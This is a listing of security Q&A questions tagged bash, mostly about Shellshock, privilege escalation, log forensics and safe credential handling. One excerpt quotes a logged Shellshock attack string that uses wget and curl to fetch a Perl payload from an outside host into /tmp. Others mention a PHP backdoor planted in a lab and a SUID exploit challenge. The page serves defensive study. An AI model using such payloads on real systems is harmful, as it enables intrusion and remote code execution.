Questions tagged [bash]

The Bourne-again shell (Bash) is a Unix shell. It lets the user run commands on the host machine through a text-based program. Questions using this tag should be related either to vulnerabilities of Bash or to the proper use of specific commands.

152 questions
13 votes, 5 answers

Is replacing bash with another shell a prudent step?

Considering that RedHat and other major teams in business are conducting an audit in bash and have uncovered a few other vulnerabilities besides -7169 (-7186 and -7187), is it sensible to link /bin/sh to another shell? Both -7186 and -7187 were…
Deer Hunter
12 votes, 1 answer

Even with the Shellshock patch, isn't Bash vulnerable to command redefinition?

At the risk of adding to the heap of "Shellshock"-related questions... The Shellshock patch prevents arbitrary code from being executed after function definitions in environment variables. For example, here is what a patched version of Bash does…
Sam Harada
10 votes, 2 answers

Does shellshock produce a comprehensive local privilege escalation vector?

If setuid scripts take arbitrary environment variables, apart from a few black-listed ones like LD_LIBRARY_PATH, from the caller, does this not mean that any setuid script running #!/bin/bash directly or indirectly is a vector for local escalation…
Ben
9 votes, 3 answers

MSFConsole/Kali Linux - gain root access to unix system

I am messing around with Kali Linux, MSFConsole and DVWA (Damn Vulnerable Web Application). I have successfully been able to get into the system (Raspberry Pi) by creating a PHP backdoor and uploading it via SQL injection. Now I have access the…
iProgram
9 votes, 4 answers

What do shellshock attacks look like in system logs?

I have some Linux servers, which from what I can tell are not vulnerable to the shellshock attack vector, but I am curious what the attack looks like in the logs. What does a successful attack look like in the apache2 logs? What would a successful…
j0h
8 votes, 1 answer

Program getting exploited inside gdb, new shell is spawned but terminated immediately

I am trying to exploit a SUID program. The program is: #include #include #include #include #define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid());…
8 votes, 1 answer

Shellshock Exploit evidence - is this a successful attack

I was looking through logs today and noticed the following: 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl…
7 votes, 2 answers

Hacked Ubuntu server, probably hacked commands (netstat, ps, ...), how to replace them?

An Ubuntu server of my company has been hacked to carry out a DoS attack. I found the shellshock bug had not been fixed by my colleagues, and I think it's the problem. Then, I found an ELF file that sends thousands of messages, and the script is…
roghan
7 votes, 5 answers

Shellshock attack scenario exploiting php

I've seen attack scenarios involving using wget on cgi-scripts, but how about a scenario exploiting a web server php script that issues an exec() or system() call to a bash script? As far as I can tell, environment variables like HTTP_USER_AGENT…
Joe Knapp
7 votes, 2 answers

/opt and sudo unzip to /opt, is it safe?

Usually we place things in /opt so they are owned by root but normal users can execute them. This prevents normal users modifying the binaries so they cannot execute arbitrary stuff. However, to put things there using sudo unzip something.zip -d…
Guerlando OCs
7 votes, 2 answers

Bash function manipulation explained

I was recently reading through a write up on a capture the flag Linux VulnHub machine. For privilege escalation, the author references 'bash function manipulation'. A Google search turns up very little on how this works. In short they run strings on…
n00b
7 votes, 3 answers

SH Write a file with contents without any special chars

So, I've got a challenge and it's as follows. You can access a normal shell(sh) on clean RHEL 6 installation. Write arbitrary content to file.txt, but without the following characters. # & \ + - % @ = : ; , . ' " ^ ` ~ _ | ! / ? * $ # < > [ ] { }…
7 votes, 2 answers

Do sudo and .profile/.bashrc enable trivial privilege escalation?

First of all, let me mention that I’m assuming a configuration as set up by current Linux desktop distributions (e.g. Debian, Fedora). I’m sure that there are methods which, if implemented, would mitigate the issues described here. What I’m…
Socob
7 votes, 2 answers

How do I track bash history cleanup?

I'd like to catch events when bash history is cleaned or some lines are deleted. Are there any best practices or auditing tools with this capability?
inx
7 votes, 3 answers

How to securely store credentials in a bash variable?

I need to cache my user credentials in a shell script variable since they are required for multiple requests to a REST-API. It won't be stored in the bash script file itself: user is prompted to enter credentials, and these will be reused along the…
Thomas R